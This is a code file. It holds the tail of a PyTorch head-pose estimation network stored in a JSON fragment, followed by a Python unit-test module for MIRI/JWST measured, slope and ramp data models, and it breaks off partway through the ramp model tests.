self.features = nn.Sequential(\n nn.AdaptiveAvgPool2d((1, 1)),\n )\n\n def forward(self, x):\n #residual =x\n x = self.ca(x) * x\n #x += residual\n x = self.features(x)\n return x\n\n\n\nclass HPNet(nn.Module):\n\n def __init__(self):\n super(HPNet, self).__init__()\n self.faceModel = efn.from_pretrained('efficientnet-b4')\n \n self.planes_num=1792#2304#2048#1536#1408#1280#1792\n self.cls_num=66\n \n self.feature_1 = PYRModule(self.planes_num)\n self.feature_2 = PYRModule(self.planes_num)\n self.feature_3 = PYRModule(self.planes_num)\n \n \n self.idx_tensor = torch.FloatTensor(torch.range(0,self.cls_num-1)*1).cuda()\n \n self.fc_b_1 = nn.Sequential(\n nn.Linear(self.planes_num, self.cls_num),\n )\n self.fc_b_2 = nn.Sequential(\n nn.Linear(self.planes_num, self.cls_num),\n )\n self.fc_b_3 = nn.Sequential(\n nn.Linear(self.planes_num, self.cls_num),\n )\n self.max_pool_1=nn.MaxPool1d(3)\n self.max_pool_2=nn.MaxPool1d(3)\n self.max_pool_3=nn.MaxPool1d(3)\n \n self.softmax=nn.Softmax(dim=2).cuda()\n self.sigmoid=nn.Sigmoid().cuda()\n \n \n def forward(self, faces):\n\n xFace = self.faceModel.extract_features(faces)\n \n \n x_p = self.feature_1(xFace)\n x_y = self.feature_2(xFace)\n x_r = self.feature_3(xFace)\n \n x_p = torch.flatten(x_p, 1)\n x_y = torch.flatten(x_y, 1)\n x_r = torch.flatten(x_r, 1)\n \n x_p_feat=torch.unsqueeze(x_p,1)\n x_y_feat=torch.unsqueeze(x_y,1)\n x_r_feat=torch.unsqueeze(x_r,1)\n \n x_feat=torch.cat([x_p_feat,x_y_feat,x_r_feat],1)\n \n x_p_b=self.fc_b_1(x_p)\n x_y_b=self.fc_b_2(x_y)\n x_r_b=self.fc_b_3(x_r)\n \n x_p_b=torch.unsqueeze(x_p_b,1)\n x_y_b=torch.unsqueeze(x_y_b,1)\n x_r_b=torch.unsqueeze(x_r_b,1)\n \n x_p_b_mp=self.max_pool_1(x_p_b)\n x_y_b_mp=self.max_pool_2(x_y_b)\n x_r_b_mp=self.max_pool_3(x_r_b)\n \n x_p_pre=self.softmax(x_p_b)\n x_y_pre=self.softmax(x_y_b)\n x_r_pre=self.softmax(x_r_b)\n \n x_p=torch.sum(x_p_pre * self.idx_tensor, 2) \n x_y=torch.sum(x_y_pre * self.idx_tensor, 2) \n x_r=torch.sum(x_r_pre * self.idx_tensor, 2)\n 
\n\n return torch.cat([x_p,x_y,x_r],1),torch.cat([x_p_b,x_y_b,x_r_b],1),torch.cat([x_p_b_mp,x_y_b_mp,x_r_b_mp],1),x_feat",
"step-ids": [
8,
10,
11,
13,
14
]
}
|
[
8,
10,
11,
13,
14
] |
#!/usr/bin/env python
# -*- coding:utf-8 -*-
"""
Module test_measured_model - Contains the unit tests for the classes
in the datamodels.miri_measured_model module.
:History:
15 Jan 2013: Created.
21 Jan 2013: Warning messages controlled with Python warnings module.
05 Feb 2013: File closing problem solved by using "with" context manager.
08 Feb 2013: Replaced 'to_fits' with more generic 'save' method.
23 Apr 2013: Modified to keep up with behaviour of jwst_lib model.
Uninitialised arrays now have the same size and shape as the
data array but are full of default values.
26 Apr 2013: File closing problem has returned!
13 May 2013: Added MiriSlopeModel to describe MIRI slope data
(which is different from "ImageModel" data because it
preserves integrations). N.B. FINAL MODEL IS TBD.
04 Jun 2013: Shortened the names of the ramp, slope and image models.
10 Jun 2013: Added more metadata tests.
02 Jul 2013: MiriCubeModel added.
29 Jul 2013: stats() method added.
14 Aug 2013: Updated ramp model test to include groupdq and pixeldq
02 Sep 2013: Compare numpy record arrays in a way that it independent
of the byte ordering.
12 Sep 2013: Swapped the MRS CHANNEL and BAND keywords.
12 Sep 2013: Test that the data product can be copied successfully.
04 Oct 2013: Changed default field_def table to use MIRI reserved flags.
07 Oct 2013: GROUP_DEF table added to MIRI ramp data. Test MiriRampModel
for masking and arithmetic operations.
24 Feb 2014: Instrument name (INSTRUME) changed from meta.instrument.type to
meta.instrument.name.
27 Feb 2014: Added extra data arrays to MiriSlopeModel test.
04 Mar 2014: Added set_housekeeping_metadata.
25 Jun 2014: field_def and group_def changed to dq_def and groupdq_def.
field_def for ramp data changed to pixeldq_def.
21 Jul 2014: IM, and LW detectors changed to MIRIMAGE and MIRIFULONG.
25 Sep 2014: Updated the reference flags. insert_value_column function
used to convert between 3 column and 4 column flag tables.
TYPE and REFTYPE are no longer identical.
07 Nov 2014: The data model now raises an IOError when an invalid file
path is provided.
11 Mar 2015: group_integration_time changed to group_time.
11 Jun 2015: Added a history record test.
09 Jul 2015: Reference output array (refout) added to MiriRampModel schema.
19 Aug 2015: Removed MiriImageModel and MiriCubeModel.
07 Oct 2015: Made exception catching Python 3 compatible.
08 Apr 2016: Removed obsolete FIXME statements.
04 May 2016: ERR array removed from ramp data model.
31 Aug 2016: Change exception detected when creating a data model with an
invalid initialiser.
15 Jun 2017: Observation and target metadata is appropriate for ramp and
slope data only.
12 Jul 2017: Replaced "clobber" parameter with "overwrite".
13 Sep 2017: Updated "not a file name" test to match the new behaviour of
JWST pipeline version 0.7.8rc2
27 Apr 2018: Corrected bug in get_history() length test.
27 Jun 2018: Removed unused arrays.
15 Feb 2018: Check that the DQ_DEF table has the correct fieldnames.
@author: Steven Beard (UKATC)
"""
import os
import unittest
import warnings
import numpy as np
# Import the JWST master data quality flag definitions
from miri.datamodels.dqflags import master_flags, pixeldq_flags, \
groupdq_flags
from miri.datamodels.miri_measured_model import MiriMeasuredModel, \
MiriRampModel, MiriSlopeModel
from miri.datamodels.tests.util import assert_recarray_equal, \
assert_products_equal
class TestMiriMeasuredModel(unittest.TestCase):
# Test the MiriMeasuredModel class
def setUp(self):
# Create a 64x64 simple MiriMeasuredModel object, with no error
# or quality arrays.
self.data = np.linspace(0.0, 100000.0, 64*64)
self.data.shape = [64,64]
self.simpleproduct = MiriMeasuredModel(data=self.data)
# Add some example metadata.
self.simpleproduct.set_housekeeping_metadata('MIRI EC', 'Joe Bloggs',
'V1.0')
self.simpleproduct.set_instrument_metadata(detector='MIRIMAGE',
filt='F560W',
ccc_pos='OPEN',
deck_temperature=10.0,
detector_temperature=7.0)
self.simpleproduct.set_exposure_metadata(readpatt='SLOW',
nints=1, ngroups=10,
frame_time=30.0,
integration_time=30.0,
group_time=300.0,
reset_time=0, frame_resets=3)
# Create a more complex MiriMeasuredModel object from primary,
# error and quality arrays.
self.primary = [[10,20,30,40], [50,60,70,80], [90,100,110,120]]
self.error = [[1,2,3,4], [5,6,7,8], [9,10,11,12]]
self.quality = [[1,0,0,0], [0,1,0,1], [1,0,1,0]]
self.dataproduct = MiriMeasuredModel(data=self.primary,
err=self.error,
dq=self.quality,
dq_def=master_flags)
# Add some example metadata.
self.dataproduct.set_instrument_metadata(detector='MIRIFUSHORT',
channel='1',
ccc_pos='OPEN',
deck_temperature=11.0,
detector_temperature=6.0)
self.dataproduct.set_exposure_metadata(readpatt='FAST',
nints=1, ngroups=1,
frame_time=1.0,
integration_time=10.0,
group_time=10.0,
reset_time=0, frame_resets=3)
self.testfile1 = "MiriMeasuredModel_test1.fits"
self.testfile2 = "MiriMeasuredModel_test2.fits"
self.tempfiles = [self.testfile1, self.testfile2]
def tearDown(self):
# Tidy up
del self.dataproduct
del self.primary, self.error, self.quality
del self.simpleproduct
del self.data
# Remove temporary files, if they exist and if able to.
for tempfile in self.tempfiles:
if os.path.isfile(tempfile):
try:
os.remove(tempfile)
except Exception as e:
strg = "Could not remove temporary file, " + tempfile + \
"\n " + str(e)
warnings.warn(strg)
del self.tempfiles
def test_creation(self):
# Check that the DQ_DEF field names in the class variable are the same
# as the ones declared in the schema.
dq_def_names = list(MiriMeasuredModel.dq_def_names)
schema_names = list(self.dataproduct.get_field_names('dq_def'))
self.assertEqual(dq_def_names, schema_names,
"'dq_def_names' class variable does not match schema")
# Test that the error and quality arrays are optional.
a2 = [[10,20,30,40], [50,60,70,80], [90,100,110,120]]
b2 = [[1,2,3,4], [5,6,7,8], [9,10,11,12]]
c2 = [[1,0,0,0], [0,1,0,1], [1,0,1,0]]
# 1) Data array only. Data array must exist and be non-empty.
# Other arrays should exist and be the same size and shape as the
# data array. They should be full of default values.
newdp1 = MiriMeasuredModel(data=a2)
self.assertIsNotNone(newdp1.data)
self.assertGreater(len(newdp1.data), 0)
self.assertIsNotNone(newdp1.err)
self.assertEqual(newdp1.err.shape, newdp1.data.shape)
# Assumes default is 0.0 - see schema
self.assertAlmostEqual(np.mean(newdp1.err), 0.0)
self.assertIsNotNone(newdp1.dq)
self.assertEqual(newdp1.dq.shape, newdp1.dq.shape)
# Assumes default is 0 - see schema
self.assertEqual(np.mean(newdp1.dq), 0)
descr1 = str(newdp1)
self.assertIsNotNone(descr1)
del newdp1, descr1
# 2) Data and error arrays only. Data and error arrays must exist
# and be non-empty. Quality array should exist but be the same
# size and shape as the data array. It should be full of default
# values.
newdp2 = MiriMeasuredModel(data=a2, err=b2)
self.assertIsNotNone(newdp2.data)
self.assertGreater(len(newdp2.data), 0)
self.assertIsNotNone(newdp2.err)
self.assertEqual(newdp2.err.shape, newdp2.data.shape)
# The error array must not be full of default values.
self.assertNotAlmostEqual(np.mean(newdp2.err), 0.0)
self.assertIsNotNone(newdp2.dq)
self.assertEqual(newdp2.dq.shape, newdp2.dq.shape)
# Assumes default is 0 - see schema
self.assertEqual(np.mean(newdp2.dq), 0)
descr2 = str(newdp2)
self.assertIsNotNone(descr2)
del newdp2, descr2
# 3) Data, error and quality arrays. All arrays must exist,
# be non-empty and be the same size and shape.
newdp3 = MiriMeasuredModel(data=a2, err=b2, dq=c2)
self.assertIsNotNone(newdp3.data)
self.assertGreater(len(newdp3.data), 0)
self.assertIsNotNone(newdp3.err)
self.assertEqual(newdp3.err.shape, newdp3.data.shape)
# The error array must not be full of default values.
self.assertNotAlmostEqual(np.mean(newdp3.err), 0.0)
self.assertIsNotNone(newdp3.dq)
self.assertEqual(newdp3.dq.shape, newdp3.dq.shape)
# The quality array must not be full of default values.
self.assertNotEqual(np.mean(newdp3.dq), 0)
descr3 = str(newdp3)
self.assertIsNotNone(descr3)
del newdp3, descr3
# It should be possible to set up an empty data product with
# a specified shape. All three arrays should be initialised to
# the same shape.
emptydp = MiriMeasuredModel( (4,4) )
self.assertIsNotNone(emptydp.data)
self.assertEqual(emptydp.data.shape, (4,4))
self.assertIsNotNone(emptydp.err)
self.assertEqual(emptydp.err.shape, (4,4))
self.assertIsNotNone(emptydp.dq)
self.assertEqual(emptydp.dq.shape, (4,4))
descr = str(emptydp)
self.assertIsNotNone(descr)
del emptydp, descr
# A null data product can also be created and populated
# with data later.
nulldp = MiriMeasuredModel( )
descr1 = str(nulldp)
self.assertIsNotNone(descr1)
nulldp.data = np.asarray(a2)
self.assertIsNotNone(nulldp.err)
self.assertIsNotNone(nulldp.dq)
descr2 = str(nulldp)
self.assertIsNotNone(descr2)
del nulldp, descr1, descr2
# A scalar data product is possible, even if of little use.
scalardp = MiriMeasuredModel( data=42 )
self.assertEqual(scalardp.data, 42)
self.assertIsNotNone(scalardp.err)
self.assertIsNotNone(scalardp.dq)
descr = str(scalardp)
self.assertIsNotNone(descr)
del scalardp, descr
# Attempts to create a data product from invalid data types
# and stupid values must be detected.
# NOTE: A bug in the JWST data model might cause an AttributeError
# to be raised instead of a ValueError. If this happens, try a newer
# version of the JWST data model library.
self.assertRaises(ValueError, MiriMeasuredModel, init=[])
self.assertRaises(ValueError, MiriMeasuredModel, init=42)
self.assertRaises(ValueError, MiriMeasuredModel, init='not a file name')
self.assertRaises(IOError, MiriMeasuredModel, init='nosuchfile.fits')
#self.assertRaises(ValueError, MiriMeasuredModel, init='')
self.assertRaises(ValueError, MiriMeasuredModel, data='badstring')
def test_metadata(self):
# Check the dataproducts contain metadata
# First test the basic STScI FITS keyword lookup method.
kwstrg = self.simpleproduct.find_fits_keyword('TELESCOP',
return_result=True)
self.assertIsNotNone(kwstrg)
# kwstrg is a list - assume the first entry is what we want.
telname = self.simpleproduct[kwstrg[0]]
self.assertEqual(telname, 'JWST')
# Accessing the tree structure directly should also work.
telname = self.simpleproduct.meta.telescope
self.assertEqual(telname, 'JWST')
# An alternative lookup provided by the MIRI data model.
telname = self.simpleproduct.get_fits_keyword('TELESCOP')
self.assertEqual(telname, 'JWST')
kwstrg = self.simpleproduct.find_fits_keyword('INSTRUME',
return_result=True)
self.assertIsNotNone(kwstrg)
insname = self.simpleproduct[kwstrg[0]]
self.assertEqual(insname, 'MIRI')
insname = self.simpleproduct.meta.instrument.name
self.assertEqual(insname, 'MIRI')
insname = self.simpleproduct.get_fits_keyword('INSTRUME')
self.assertEqual(insname, 'MIRI')
# Add some history records and check they exist.
self.simpleproduct.add_history('History 1')
self.simpleproduct.add_history('History 2')
self.simpleproduct.add_history('History 3')
self.assertGreaterEqual(len(self.simpleproduct.get_history()), 3)
strg = self.simpleproduct.get_history_str()
self.assertIsNotNone(strg)
self.assertGreater(len(strg), 0)
def test_content(self):
# The data, err and dq attributes are aliases for the primary,
# error and quality arrays
self.assertTrue( np.allclose(self.primary, self.dataproduct.data) )
self.assertTrue( np.allclose(self.error, self.dataproduct.err) )
self.assertTrue( np.allclose(self.quality, self.dataproduct.dq) )
def test_copy(self):
# Test that a copy can be made of the data product.
datacopy = self.dataproduct.copy()
self.assertIsNotNone(datacopy)
assert_products_equal( self, self.dataproduct, datacopy,
arrays=['data', 'err', 'dq'],
tables='dq_def' )
del datacopy
def test_fitsio(self):
# Suppress metadata warnings
with warnings.catch_warnings():
warnings.simplefilter("ignore")
# Check that the data products can be written to a FITS
# file and read back again without changing the data.
self.simpleproduct.save(self.testfile1, overwrite=True)
with MiriMeasuredModel(self.testfile1) as readback:
self.assertTrue( np.allclose(self.simpleproduct.data,
readback.data) )
del readback
self.dataproduct.save(self.testfile2, overwrite=True)
with MiriMeasuredModel(self.testfile2) as readback:
assert_products_equal( self, self.dataproduct, readback,
arrays=['data', 'err', 'dq'],
tables='dq_def' )
del readback
    def test_asciiio(self):
        """Placeholder for an ASCII round-trip test.

        The products should eventually be written to an ASCII file and
        read back without changing the data, but jwst_lib currently
        supports FITS I/O only, so this test is a no-op for now.
        """
        # TODO: At the moment jwst_lib only supports FITS I/O
        pass
#         # Suppress metadata warnings
#         with warnings.catch_warnings():
#             warnings.simplefilter("ignore")
#             self.simpleproduct.save(self.testfile_ascii, overwrite=True)
#             with MiriMeasuredModel(self.testfile_ascii) as readback:
#                 self.assertTrue( np.allclose(self.simpleproduct.data,
#                                              readback.data) )
#                 del readback
def test_masking(self):
# The DQ array must mask off bad values in the SCI and ERR arrays.
a2 = [[10,999,10,999], [999,10,10,999], [10,10,999,10]]
b2 = [[1,99,1,99], [99,1,1,99], [1,1,99,1]]
c2 = [[0,1,0,1], [1,0,0,1], [0,0,1,0]]
# Without a DQ array (assuming the default quality value is 0)
# the SCI and ERR arrays are not masked, so their averages
# include the 999s and are greater than they ought to be.
newdp = MiriMeasuredModel(data=a2, err=b2)
meandata = np.mean(newdp.data_masked)
self.assertGreater(meandata, 10)
meanerr = np.mean(newdp.err_masked)
self.assertGreater(meanerr, 1)
# The addition of the quality data should cause the SCI and ERR
# arrays to be masked off and give the correct average.
newdp2 = MiriMeasuredModel(data=a2, err=b2, dq=c2)
meandata2 = np.mean(newdp2.data_masked)
self.assertAlmostEqual(meandata2, 10)
meanerr2 = np.mean(newdp2.err_masked)
self.assertAlmostEqual(meanerr2, 1)
del newdp, newdp2
    def test_arithmetic(self):
        """Exercise scalar and product arithmetic (+, -, *, /) on
        MiriMeasuredModel, including error propagation, DQ combination
        and division-by-zero handling.
        """
        # NOTE(review): many checks below use the pattern
        # assertEqual(test1.all(), test2.all()), which compares two
        # booleans (each array's "all elements truthy" flag) rather
        # than comparing the arrays element-by-element. They are far
        # weaker than intended; np.allclose(test1, test2) would be a
        # real check. Left untouched here to preserve test behavior.
        a2 = [[90,80,70,60],[50,40,30,20],[10,0,-10,-20]]
        b2 = [[1,2,3,4],[5,6,7,8],[9,10,11,12]]
        c2 = [[0,1,1,0],[0,2,0,2],[1,0,1,0]]
        newdp = MiriMeasuredModel(data=a2, err=b2, dq=c2)
        # Self-subtraction of the simple product. The result
        # should be zero.
        newsimple = self.simpleproduct - self.simpleproduct
        self.assertAlmostEqual(newsimple.data.all(), 0.0)
        del newsimple
        # Scalar addition
        result = self.dataproduct + 42
        test1 = self.dataproduct.data + 42
        test2 = result.data
        self.assertEqual(test1.all(), test2.all())
        del result
        # Data product addition
        result = self.dataproduct + newdp
        test1 = self.dataproduct.data + newdp.data
        test2 = result.data
        self.assertEqual(test1.all(), test2.all())
        # Test that error arrays are combined properly - at least for
        # a couple of unmasked points.
        # Errors are expected to add in quadrature: err^2 = e1^2 + e2^2.
        expectedsq = self.error[1][0]*self.error[1][0] + b2[1][0]*b2[1][0]
        actualsq = result.err[1,0]*result.err[1,0]
        self.assertAlmostEqual(expectedsq, actualsq)
        expectedsq = self.error[2][1]*self.error[2][1] + b2[2][1]*b2[2][1]
        actualsq = result.err[2,1]*result.err[2,1]
        self.assertAlmostEqual(expectedsq, actualsq)
        del result
        # Scalar subtraction
        result = self.dataproduct - 42
        test1 = self.dataproduct.data - 42
        test2 = result.data
        self.assertEqual(test1.all(), test2.all())
        del result
        # Data product subtraction
        result = self.dataproduct - newdp
        test1 = self.dataproduct.data - newdp.data
        test2 = result.data
        self.assertEqual(test1.all(), test2.all())
        # Test that error arrays are combined properly - at least for
        # a couple of unmasked points.
        # Subtraction also adds the errors in quadrature.
        expectedsq = self.error[1][0]*self.error[1][0] + b2[1][0]*b2[1][0]
        actualsq = result.err[1,0]*result.err[1,0]
        self.assertAlmostEqual(expectedsq, actualsq)
        expectedsq = self.error[2][1]*self.error[2][1] + b2[2][1]*b2[2][1]
        actualsq = result.err[2,1]*result.err[2,1]
        self.assertAlmostEqual(expectedsq, actualsq)
        del result
        # Addition and subtraction should cancel each other out
        result = self.dataproduct + newdp - newdp
        test1 = self.dataproduct.data
        test2 = result.data
        self.assertEqual(test1.all(), test2.all())
        del result
        # Scalar multiplication
        result = self.dataproduct * 3
        test1 = self.dataproduct.data * 3
        test2 = result.data
        self.assertEqual(test1.all(), test2.all())
        del result
        # Data product multiplication
        result = self.dataproduct * newdp
        test1 = self.dataproduct.data * newdp.data
        test2 = result.data
        self.assertEqual(test1.all(), test2.all())
        # Product-rule error propagation for multiplication:
        # err = sqrt((e1*d2)^2 + (e2*d1)^2).
        err1 = self.dataproduct.err
        da1 = self.dataproduct.data
        err2 = newdp.err
        da2 = newdp.data
        expectedErr = np.sqrt(err1 * err1 * da2 * da2 + err2 * err2 * da1 * da1)
        self.assertTrue(np.array_equal(expectedErr, result.err))
        del result, da1, da2, err1, err2, expectedErr
        # Scalar division
        result = self.dataproduct / 3.0
        test1 = self.dataproduct.data / 3.0
        test2 = result.data
        self.assertAlmostEqual(test1.all(), test2.all())
        del test1, test2, result
        # Division by zero
        self.assertRaises(ValueError, self.dataproduct.__truediv__, 0.0)
        # Data product division
        #print("NOTE: The following test is expected to generate run time warnings.")
        with warnings.catch_warnings():
            warnings.simplefilter("ignore")
            result = self.dataproduct / newdp
            test1 = self.dataproduct.data / newdp.data
            test2 = result.data
            self.assertEqual(test1.all(), test2.all())
            # Test Juergen Schreiber error propagation
            # Quotient-rule propagation at one sample point [1][1]:
            # err = sqrt(e1^2/d2^2 + e2^2*d1^2/d2^4).
            dat = self.dataproduct.data[1][1]
            newdat = newdp.data[1][1]
            resultErr = result.err[1][1]
            dpErr = self.dataproduct.err[1][1]
            newdpErr = newdp.err[1][1]
            expectErr = np.sqrt( dpErr * dpErr/(newdat * newdat) + \
                                 newdpErr * newdpErr * dat * dat / \
                                 (newdat * newdat * newdat * newdat))
            self.assertEqual(expectErr, resultErr)
            del test1, test2, result
        # More complex arithmetic should be possible.
        newdp2 = newdp * 2
        newdp3 = newdp * 3
        newdp4 = newdp2 + newdp3
        result = ((self.dataproduct - newdp) * newdp2 / newdp3) + newdp4
        del newdp, newdp2, newdp3, newdp4
        del result
    def test_broadcasting(self):
        """Check that arithmetic between products whose arrays have
        broadcast-compatible (but different) shapes works, and that
        incompatible shapes are rejected at construction time.
        """
        # Test that operations where the broadcasting of one array
        # onto a similar shaped array work.
        a4x3 = [[90,80,70,60],[50,40,30,20],[10,0,-10,-20]]
        b4x3 = [[1,2,3,4],[5,6,7,8],[9,10,11,12]]
        #c4x3 = [[0,1,0,0],[0,0,1,0],[1,0,0,1]]
        a4x1 = [4,3,2,1]
        b4x1 = [1,2,1,2]
        c4x1 = [0,1,0,0]
        #a5x1 = [5,4,3,2,1]
        #b5x1 = [1,2,3,2,1]
        c5x1 = [0,1,0,0,1]
        # Create an object with 4x3 primary and error arrays but a 4x1
        # quality array. This should succeed because the quality array
        # is broadcastable.
        newdp1 = MiriMeasuredModel(data=a4x3, err=b4x3, dq=c4x1)
        self.assertTrue( np.allclose(a4x3, newdp1.data) )
        self.assertTrue( np.allclose(b4x3, newdp1.err) )
        self.assertTrue( np.allclose(c4x1, newdp1.dq) )
        # 5x1 is not broadcastable onto 4x3 and this statement should fail.
        # NOTE: Unfortunately this test also issues a warning message,
        # "'MiriMeasuredModel' object has no attribute '_real_cls'".
        # Turning off warnings does not stop this message from appearing.
        # NOTE(review): the keyword names 'error' and 'quality' differ
        # from the 'err'/'dq' used elsewhere in this test — presumably
        # intentional (TypeError is expected either way), but worth
        # confirming against the MiriMeasuredModel signature.
        self.assertRaises(TypeError, MiriMeasuredModel, data=a4x3,
                          error=b4x3, quality=c5x1)
        # Combine two broadcastable object mathematically.
        # The + and - operations should be commutative and the result
        # should be saveable to a FITS file.
        newdp2 = MiriMeasuredModel(data=a4x1, err=b4x1, dq=c4x1)
        result1 = newdp1 + newdp2
        result2 = newdp2 + newdp1
        self.assertEqual(result1.data.shape, result2.data.shape)
        self.assertTrue( np.allclose(result1.data, result2.data) )
        self.assertTrue( np.allclose(result1.err, result2.err) )
        self.assertTrue( np.allclose(result1.dq, result2.dq) )
        result1.save(self.testfile1, overwrite=True)
        result2.save(self.testfile2, overwrite=True)
        del result1, result2
        result1 = newdp1 * newdp2
        result2 = newdp2 * newdp1
        self.assertEqual(result1.data.shape, result2.data.shape)
        self.assertTrue( np.allclose(result1.data, result2.data) )
        self.assertTrue( np.allclose(result1.err, result2.err) )
        self.assertTrue( np.allclose(result1.dq, result2.dq) )
        result1.save(self.testfile1, overwrite=True)
        result2.save(self.testfile2, overwrite=True)
        del result1, result2
        # The - and / operations are not commutative, but the data shape
        # should be consistent and the quality arrays should be combined
        # in the same way.
        result1 = newdp1 - newdp2
        result2 = newdp2 - newdp1
        self.assertEqual(result1.data.shape, result2.data.shape)
        self.assertTrue( np.allclose(result1.err, result2.err) )
        self.assertTrue( np.allclose(result1.dq, result2.dq) )
        result1.save(self.testfile1, overwrite=True)
        result2.save(self.testfile2, overwrite=True)
        del result1, result2
        result1 = newdp1 / newdp2
        result2 = newdp2 / newdp1
        self.assertEqual(result1.data.shape, result2.data.shape)
        # The errors resulting from division depend on the order
        # of the operation.
        self.assertTrue( np.allclose(result1.dq, result2.dq) )
        result1.save(self.testfile1, overwrite=True)
        result2.save(self.testfile2, overwrite=True)
        del result1, result2
def test_description(self):
# Test that the querying and description functions work.
# For the test to pass these need to run without error
# and generate non-null strings.
descr = str(self.simpleproduct)
self.assertIsNotNone(descr)
del descr
descr = repr(self.simpleproduct)
self.assertIsNotNone(descr)
del descr
descr = self.simpleproduct.stats()
self.assertIsNotNone(descr)
del descr
descr = str(self.dataproduct)
self.assertIsNotNone(descr)
del descr
descr = str(self.dataproduct)
self.assertIsNotNone(descr)
del descr
descr = self.dataproduct.stats()
self.assertIsNotNone(descr)
del descr
# Attempt to access the SCI, ERROR and DQ arrays through attributes.
descr = str(self.dataproduct.data)
self.assertIsNotNone(descr)
del descr
descr = str(self.dataproduct.err)
self.assertIsNotNone(descr)
del descr
descr = str(self.dataproduct.dq)
self.assertIsNotNone(descr)
del descr
class TestMiriRampModel(unittest.TestCase):
    """Unit tests for MiriRampModel (4-D ramp data with PIXELDQ/GROUPDQ)."""
    # Most of the necessary tests are already carried out by
    # the TestMiriMeasuredModel class.
    def setUp(self):
        """Build a fully-populated 2x3x3x4 ramp product with metadata."""
        # Create a ramp data product.
        # NOTE: A ramp product does not contain an ERR array.
        self.a1 = [[10,20,30,40], [50,60,70,80], [90,100,110,120]]
        self.c1 = [[1,0,0,0], [0,1,0,1], [1,0,1,0]]
        self.c2 = [[0,1,1,0], [1,0,0,1], [1,0,1,0]]
        self.acube = [self.a1,self.a1,self.a1]
        self.ccube = [self.c1,self.c2,self.c1]
        self.ahyper = [self.acube,self.acube]
        self.chyper = [self.ccube,self.ccube]
        self.refout = np.ones_like(self.chyper)
        self.dataproduct = MiriRampModel(data=self.ahyper, refout=self.refout,
                                         pixeldq=self.c1,
                                         dq_def=pixeldq_flags,
                                         groupdq=self.chyper,
                                         groupdq_def=groupdq_flags)
        # Add some example metadata.
        self.dataproduct.set_housekeeping_metadata('MIRI EC', 'Joe Bloggs',
                                                   'V1.0')
        self.dataproduct.set_observation_metadata()
        self.dataproduct.set_target_metadata(0.0, 0.0)
        self.dataproduct.set_instrument_metadata(detector='MIRIFULONG',
                                                 channel='1',
                                                 ccc_pos='OPEN',
                                                 deck_temperature=11.0,
                                                 detector_temperature=6.0)
        self.dataproduct.set_exposure_metadata(readpatt='FAST',
                                               nints=1, ngroups=1,
                                               frame_time=1.0,
                                               integration_time=10.0,
                                               group_time=10.0,
                                               reset_time=0, frame_resets=3)
        self.testfile = "MiriRampModel_test.fits"
    def tearDown(self):
        """Release test data and remove the temporary FITS file."""
        # Tidy up
        del self.a1, self.c1, self.c2
        del self.acube, self.ccube
        del self.ahyper, self.chyper
        del self.dataproduct
        # Remove temporary file, if able to.
        if os.path.isfile(self.testfile):
            try:
                os.remove(self.testfile)
            except Exception as e:
                # Best-effort cleanup: warn rather than fail the test run.
                strg = "Could not remove temporary file, " + self.testfile + \
                    "\n " + str(e)
                warnings.warn(strg)
    def test_creation(self):
        """Quality arrays are optional; dimensionality is enforced."""
        # Test that any of the quality arrays are optional.
        # NOTE(review): b1/bcube/bhyper below are never used in this test.
        b1 = [[1,2,3,4], [5,6,7,8], [9,10,11,12]]
        bcube = [b1,b1,b1]
        bhyper = [bcube,bcube]
        # 1) Data array only. Data array must exist and be non-empty.
        # The quality arrays must be 2-D and 4-D.
        # Unspecified arrays must be filled with default values.
        newdp1 = MiriRampModel(data=self.ahyper)
        self.assertIsNotNone(newdp1.data)
        self.assertGreater(len(newdp1.data), 0)
        # Assumes default is 0.0 - see schema
        self.assertIsNotNone(newdp1.pixeldq)
        self.assertTrue(newdp1.pixeldq.ndim == 2)
        # Assumes default is 0 - see schema
        # FIXME: The pixeldq array ends up containing null values.
        #self.assertEqual(np.mean(newdp1.pixeldq), 0)
        self.assertIsNotNone(newdp1.groupdq)
        self.assertTrue(newdp1.groupdq.ndim == 4)
        # Assumes default is 0 - see schema
        self.assertEqual(np.mean(newdp1.groupdq), 0)
        descr1 = str(newdp1)
        del newdp1, descr1
        # 2) Data and both quality arrays. All arrays must exist,
        # be non-empty and be the shape specified.
        newdp3 = MiriRampModel(data=self.ahyper, pixeldq=self.c1,
                               groupdq=self.chyper)
        self.assertIsNotNone(newdp3.data)
        self.assertGreater(len(newdp3.data), 0)
        # The pixeldq array must not be full of default values.
        self.assertIsNotNone(newdp3.pixeldq)
        self.assertTrue(newdp3.pixeldq.ndim == 2)
        self.assertNotEqual(np.mean(newdp3.pixeldq), 0)
        self.assertIsNotNone(newdp3.groupdq)
        self.assertTrue(newdp3.groupdq.ndim == 4)
        # The groupdq array must not be full of default values.
        self.assertNotEqual(np.mean(newdp3.groupdq), 0)
        descr3 = str(newdp3)
        del newdp3, descr3
        # 3) Data and pixeldq array only. All arrays must exist,
        # be non-empty and be the shape specified.
        newdp4 = MiriRampModel(data=self.ahyper, pixeldq=self.c1)
        self.assertIsNotNone(newdp4.data)
        self.assertGreater(len(newdp4.data), 0)
        # The pixeldq array must not be full of default values.
        self.assertIsNotNone(newdp4.pixeldq)
        self.assertTrue(newdp4.pixeldq.ndim == 2)
        self.assertNotEqual(np.mean(newdp4.pixeldq), 0)
        self.assertIsNotNone(newdp4.groupdq)
        self.assertTrue(newdp4.groupdq.ndim == 4)
        descr4 = str(newdp4)
        del newdp4, descr4
        # 4) Data and groupdq array only. All arrays must exist,
        # be non-empty and be the shape specified.
        newdp5 = MiriRampModel(data=self.ahyper, groupdq=self.chyper)
        self.assertIsNotNone(newdp5.data)
        self.assertGreater(len(newdp5.data), 0)
        self.assertIsNotNone(newdp5.pixeldq)
        self.assertTrue(newdp5.pixeldq.ndim == 2)
        # The groupdq array must not be full of default values.
        self.assertIsNotNone(newdp5.groupdq)
        self.assertTrue(newdp5.groupdq.ndim == 4)
        # The groupdq array must not be full of default values.
        self.assertNotEqual(np.mean(newdp5.groupdq), 0)
        descr5 = str(newdp5)
        del newdp5, descr5
        # It should be possible to set up an empty data product with
        # a specified 4-D shape. Data array should be
        # initialised to the same shape.
        emptydp = MiriRampModel( (2,2,2,2) )
        self.assertIsNotNone(emptydp.data)
        self.assertEqual(emptydp.data.shape, (2,2,2,2))
        self.assertIsNotNone(emptydp.pixeldq)
        #self.assertEqual(emptydp.pixeldq.shape, (2,2))
        self.assertIsNotNone(emptydp.groupdq)
        self.assertEqual(emptydp.groupdq.shape, (2,2,2,2))
        descr = str(emptydp)
        self.assertIsNotNone(descr)
        del emptydp, descr
        # A null data product can also be created and populated
        # with data later.
        nulldp = MiriRampModel( )
        descr1 = str(nulldp)
